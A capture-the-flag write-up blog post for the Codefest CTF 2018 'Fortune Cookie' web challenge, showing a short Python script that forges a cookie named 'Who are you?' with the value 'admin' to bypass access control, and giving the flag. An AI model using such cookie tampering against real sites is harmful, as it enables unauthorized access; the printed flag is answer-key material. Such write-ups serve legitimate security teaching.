Codefest CTF 2018: Fortune Cookie

Challenge

H4k3r has heard that there is a secret hidden behind this website, but he is confused as to how to get access to it. Can you help him?

Solution

What you can do is open up your web browser’s Developer Tools. If you check out the Network tab before you load the page, you can examine the request a bit more.

If you check out the request headers, you can see Set-Cookie: Who are you?=Me… but it already expired.

So you can use something to set the cookie value, Who are you? to the value admin and the flag will pop out. Here’s my get_flag script:

import requests

url = 'http://34.216.132.109:8084/'

cookies = {'Who are you?' : 'admin'}

r = requests.get(url, cookies = cookies)

print r.text

The flag is: CodefestCTF{f0r7Un4B1sC0TtO}

Rispondi

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo di WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione /  Modifica )

Google photo

Stai commentando usando il tuo account Google. Chiudi sessione /  Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione /  Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione /  Modifica )

Connessione a %s...

Questo sito utilizza Akismet per ridurre lo spam. Scopri come vengono elaborati i dati derivati dai commenti.